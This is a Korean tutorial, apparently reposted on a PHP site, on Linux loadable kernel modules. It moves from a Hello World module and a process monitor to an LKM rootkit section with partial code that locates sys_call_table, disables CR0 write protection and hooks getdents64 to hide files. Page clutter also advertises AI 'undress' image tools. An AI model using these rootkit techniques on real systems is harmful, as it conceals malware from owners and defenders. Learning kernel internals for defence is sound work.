안녕하세요 여러분! 오늘은 간단한 "Hello World" 모듈부터 LKM 루트킷 생성까지 LKM(로드 가능한 커널 모듈)을 안내하겠습니다. 이 내용이 도움이 되었다면 자유롭게 공유해 주시고, 끝까지 읽어주신 모든 분들께 미리 감사드립니다. 게시물 하단에 링크된 모든 코드와 참조 자료가 있으므로 소스를 꼭 확인하세요. 저를 믿으세요. 이를 자세히 살펴보고 코드를 수정하면 더 많은 것을 배우는 데 정말 도움이 될 것입니다. 하지만 주의하세요. 일부 코드는 GPL 3 라이센스를 따르므로 해당 약관을 숙지하고 있어야 합니다.
필요한 것:
리눅스-헤더-일반
C 컴파일러(GCC 또는 cc를 권장합니다)
목차:
- 1) LKM이란 무엇이며 어떻게 작동하나요
- 2) LKM Makefile 예시
- 3) 모듈이 커널에 로드되는 방법
- 4) LKM "Hello World"
- 5) 지난 몇 년간의 주요 변화
- 6) Kernel 5.7의 Syscall 테이블 변경
- 7) 공정 모니터링을 위한 LKM
- 8) LKM 루트킷 구축
1) LKM이란 무엇이며 어떻게 작동합니까?
LKM은 전체 커널을 다시 컴파일할 필요 없이 하드웨어용 드라이버를 추가하는 등 Linux 커널의 기능을 확장하는 데 도움이 되는 로드 가능한 커널 모듈입니다. 장치 드라이버(예: 사운드 카드), 파일 시스템 등에 적합합니다. 모든 LKM에는 최소한 다음 두 가지 기본 기능이 필요합니다.
static int __init module_init(void)
{
return 0;
}
static void __exit module_exit(void)
{
}
2) LKM 메이크파일 예:
다음은 모듈 컴파일을 위한 매우 간단한 Makefile입니다.
obj-m := example.o KDIR := /lib/modules/$(shell uname -r)/build PWD := $(shell pwd) all: $(MAKE) -C $(KDIR) M=$(PWD) modules clean: $(MAKE) -C $(KDIR) M=$(PWD) clean
3) 모듈이 커널에 로드되는 방법:
lsmod 명령을 사용하면 커널에 로드된 모듈을 볼 수 있습니다. /proc/modules의 정보를 확인합니다. 모듈은 일반적으로 다음과 같은 별칭을 통해 커널을 식별합니다.
별칭 char-major-10–30 소프트독
이것은 modprobe에게 Softdog.o 모듈이 로드되어야 함을 알리고 /lib/modules/version/modules.dep에서 depmod -a를 실행하여 생성된 종속성을 확인합니다.
4) LKM "안녕하세요 세계":
초기본적인 'Hello World' 모듈을 만드는 방법은 다음과 같습니다.
#include <linux>
#include <linux>
#include <linux>
static int __init hello_init(void)
{
printk(KERN_INFO "Hello World\n");
return 0;
}
static void __exit hello_exit(void)
{
printk(KERN_INFO" Bye bye!");
}
module_init(hello_init);
module_exit(hello_exit);
MODULE_AUTHOR("BrunoCiccarino");
MODULE_LICENSE("GPL");
</linux></linux></linux>
5) 수년간 LKM의 주요 변화:
시간이 지남에 따라 LKM에는 상당히 중요한 변화가 있었으므로 이를 Linux 커널 버전별로 분류해 보겠습니다.
커널 2.x(최대 2.6):
동적 LKM 로드 및 언로드에 대한 초기 지원
더 나은 디버깅 도구(OOPS, PANIC).
커널 2.6.x:
보다 나은 기기 관리를 위한 udev를 소개합니다.
더 빠른 응답 시간을 위한 선점형 커널.
NPTL(네이티브 Posix 스레드 라이브러리)은 다중 스레드 프로세스 처리를 개선합니다.
커널 3.x:
네임스페이스 지원, Docker와 같은 컨테이너 기술 개선
파일 시스템 및 GPU 드라이버 개선.
커널 4.x:
KASLR을 통해 커널 보안이 강화됩니다.
더 나은 컨테이너 지원(Cgroups, 네임스페이스).
새로운 하드웨어를 지원합니다.
커널 5.x:
더 나은 파일 시스템 암호화 및 라이브 패치.
단순한 네트워크를 넘어 BPF 확장.
RISC-V 및 ARM 지원이 향상되었습니다.
커널 5.7:
주요 변경 사항: 보안상의 이유로 syscall 테이블(sys_call_table)에 대한 액세스가 더 어려워졌습니다. syscall 테이블을 수정해야 하는 모듈을 조정해야 했습니다.
커널 6.x:
더 안전한 커널 모듈 개발을 위한 Rust 언어 지원
모바일 장치의 에너지 효율성에 중점을 두고 보안 및 격리를 개선했습니다.
6) 커널 5.7의 Syscall 테이블 변경 사항:
Linux 5.7에서는 syscall 테이블을 보호하기 위해 변경되었습니다. 이제 쓰기 금지되어 있어 쉽게 액세스할 수 없습니다. 이는 보안 측면에서는 큰 이점이지만 이에 의존하는 합법적인 모듈에서는 복잡한 문제입니다. sys_call_table을 찾기 위해 kprobes.h를 사용했다면 새로운 전략이 필요합니다. 이제는 쓰기 방지(WP)와 같은 보호 기능으로 인해 직접 수정할 수 없습니다.
7) 공정 모니터링을 위한 LKM:
타이머를 사용하여 주기적으로(예: 2초마다) 검사를 실행하여 커널의 프로세스를 모니터링하는 모듈입니다. 프로세스 생성 및 종료, 파일 액세스, 네트워크 사용 등을 감시합니다.
이를 시작하는 데 도움이 되는 몇 가지 코드는 다음과 같습니다.
#include <linux>
#include <linux>
#include <linux>
#include <linux>
static struct timer_list procmonitor_timer;
static void procmonitor_check_proc_tree(unsigned long unused)
{
struct task_struct *task;
for_each_process(task)
printk(KERN_INFO "process: %s, PID: %d\n", task->comm, task->pid);
mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(2000));
}
static int __init procmonitor_init(void)
{
setup_timer(&procmonitor_timer, procmonitor_check_proc_tree, 0);
mod_timer(&procmonitor_timer, jiffies + msecs_to_jiffies(200));
return 0;
}
static void __exit procmonitor_exit(void)
{
del_timer_sync(&procmonitor_timer);
}
module_init(procmonitor_init);
module_exit(procmonitor_exit);
</linux></linux></linux></linux>
8) LKM 루트킷:
루트킷은 기본적으로 악성 코드를 숨기기 위해 시스템 호출을 하이재킹하는 악성 모듈입니다. syscall 테이블에 연결하여 동작을 수정하는 방법은 다음과 같습니다.
먼저 syscall 테이블을 찾아야 합니다.
unsigned long *find_syscall_table(void)
{
typedef unsigned long (*kallsyms_lookup_name_t)(const char *name);
kallsyms_lookup_name_t kallsyms_lookup_name;
register_kprobe(&kp);
kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr;
unregister_kprobe(&kp);
return (unsigned long*)kallsyms_lookup_name("sys_call_table");
}
그런 다음 syscall 테이블이 있는 메모리를 보호 해제할 수 있습니다.
static inline void unprotect_memory(void)
{
write_cr0_forced(cr0 & ~0x00010000);
}
그런 다음 원래 기능을 후크로 교체하세요.
static int __init ghost_init(void)
{
__syscall_table = find_syscall_table();
if (!__syscall_table) return -1;
cr0 = read_cr0();
orig_getdents64 = (void *)__syscall_table[MY_NR_getdents];
unprotect_memory();
__syscall_table[MY_NR_getdents] = (unsigned long)hook_getdents64;
protect_memory();
return 0;
}
후크 기능은 파일을 가로채서 숨깁니다.
asmlinkage int hook_getdents64(unsigned int fd, struct linux_dirent64 *dirp, unsigned int count) {
int ret = orig_getdents64(fd, dirp, count);
// Intercept the syscall here...
return ret;
}
制作人员
黑客的选择
elinux
内核br
xcellerator
lkmpg
爱猫人士
我的rootkit
二吗啡
위 내용은 LKM Addict, lkm의 기본을 배워요의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
C에서 XML 사용 : 라이브러리 및 도구에 대한 안내서May 09, 2025 am 12:16 AMXML은 데이터, 특히 구성 파일, 데이터 저장 및 네트워크 통신에서 데이터를 구조화하는 편리한 방법을 제공하기 때문에 C에서 사용됩니다. 1) TinyXML, PugixML, RapidXML과 같은 적절한 라이브러리를 선택하고 프로젝트 요구에 따라 결정하십시오. 2) XML 파싱 및 생성의 두 가지 방법을 이해하십시오. DOM은 자주 액세스 및 수정에 적합하며 SAX는 큰 파일 또는 스트리밍 데이터에 적합합니다. 3) 성능을 최적화 할 때 TinyXML은 작은 파일에 적합하며 PugixML은 메모리와 속도에서 잘 작동하며 RapidXML은 큰 파일을 처리하는 데 탁월합니다.
C# 및 C : 다른 패러다임 탐색May 08, 2025 am 12:06 AMC#과 C의 주요 차이점은 메모리 관리, 다형성 구현 및 성능 최적화입니다. 1) C#은 쓰레기 수집기를 사용하여 메모리를 자동으로 관리하는 반면 C는 수동으로 관리해야합니다. 2) C#은 인터페이스 및 가상 방법을 통해 다형성을 실현하고 C는 가상 함수와 순수한 가상 함수를 사용합니다. 3) C#의 성능 최적화는 구조 및 병렬 프로그래밍에 따라 다르며 C는 인라인 함수 및 멀티 스레딩을 통해 구현됩니다.
C XML 파싱 : 기술 및 모범 사례May 07, 2025 am 12:06 AMDOM 및 SAX 방법은 XML 데이터를 C에서 구문 분석하는 데 사용될 수 있습니다. 1) DOM 파싱은 XML로드를 메모리로, 작은 파일에 적합하지만 많은 메모리를 차지할 수 있습니다. 2) Sax Parsing은 이벤트 중심이며 큰 파일에 적합하지만 무작위로 액세스 할 수는 없습니다. 올바른 방법을 선택하고 코드를 최적화하면 효율성이 향상 될 수 있습니다.
특정 도메인의 C : 거점 탐색May 06, 2025 am 12:08 AMC는 고성능과 유연성으로 인해 게임 개발, 임베디드 시스템, 금융 거래 및 과학 컴퓨팅 분야에서 널리 사용됩니다. 1) 게임 개발에서 C는 효율적인 그래픽 렌더링 및 실시간 컴퓨팅에 사용됩니다. 2) 임베디드 시스템에서 C의 메모리 관리 및 하드웨어 제어 기능이 첫 번째 선택이됩니다. 3) 금융 거래 분야에서 C의 고성능은 실시간 컴퓨팅의 요구를 충족시킵니다. 4) 과학 컴퓨팅에서 C의 효율적인 알고리즘 구현 및 데이터 처리 기능이 완전히 반영됩니다.
신화를 파악 : C는 정말로 죽은 언어입니까?May 05, 2025 am 12:11 AMC는 죽지 않았지만 많은 주요 영역에서 번성했습니다 : 1) 게임 개발, 2) 시스템 프로그래밍, 3) 고성능 컴퓨팅, 4) 브라우저 및 네트워크 응용 프로그램, C는 여전히 유명한 활력 및 응용 시나리오를 보여줍니다.
C# vs. C : 프로그래밍 언어의 비교 분석May 04, 2025 am 12:03 AMC#과 C의 주요 차이점은 구문, 메모리 관리 및 성능입니다. 1) C# Syntax는 현대적이며 Lambda 및 Linq를 지원하며 C 기능을 유지하고 템플릿을 지원합니다. 2) C# 자동으로 메모리를 관리하고 C는 수동으로 관리해야합니다. 3) C 성능은 C#보다 낫지 만 C# 성능도 최적화되고 있습니다.
C를 사용하여 XML 애플리케이션 구축 : 실제 예제May 03, 2025 am 12:16 AMtinyxml, pugixml 또는 libxml2 라이브러리를 사용하여 C에서 XML 데이터를 처리 할 수 있습니다. 1) XML 파일을 구문 분석 할 수 있습니다. dom 또는 sax 메소드 사용, dom은 작은 파일에 적합하며 Sax는 큰 파일에 적합합니다. 2) XML 파일 생성 : 데이터 구조를 XML 형식으로 변환하고 파일에 씁니다. 이러한 단계를 통해 XML 데이터를 효과적으로 관리하고 조작 할 수 있습니다.
C의 XML : 복잡한 데이터 구조 처리May 02, 2025 am 12:04 AMC에서 XML 데이터 구조로 작업하면 tinyxml 또는 pugixml 라이브러리를 사용할 수 있습니다. 1) pugixml 라이브러리를 사용하여 XML 파일을 구문 분석하고 생성하십시오. 2) 책 정보와 같은 복잡한 중첩 XML 요소를 처리합니다. 3) XML 처리 코드를 최적화하면 효율적인 라이브러리 및 스트리밍 구문 분석을 사용하는 것이 좋습니다. 이러한 단계를 통해 XML 데이터를 효율적으로 처리 할 수 있습니다.
핫 AI 도구
Undresser.AI Undress
사실적인 누드 사진을 만들기 위한 AI 기반 앱
AI Clothes Remover
사진에서 옷을 제거하는 온라인 AI 도구입니다.
Undress AI Tool
무료로 이미지를 벗다
Clothoff.io
AI 옷 제거제
Video Face Swap
완전히 무료인 AI 얼굴 교환 도구를 사용하여 모든 비디오의 얼굴을 쉽게 바꾸세요!
인기 기사
뜨거운 도구
SublimeText3 Mac 버전
신 수준의 코드 편집 소프트웨어(SublimeText3)
SublimeText3 Linux 새 버전
SublimeText3 Linux 최신 버전
ZendStudio 13.5.1 맥
강력한 PHP 통합 개발 환경
SublimeText3 영어 버전
권장 사항: Win 버전, 코드 프롬프트 지원!
안전한 시험 브라우저
안전한 시험 브라우저는 온라인 시험을 안전하게 치르기 위한 보안 브라우저 환경입니다. 이 소프트웨어는 모든 컴퓨터를 안전한 워크스테이션으로 바꿔줍니다. 이는 모든 유틸리티에 대한 액세스를 제어하고 학생들이 승인되지 않은 리소스를 사용하는 것을 방지합니다.
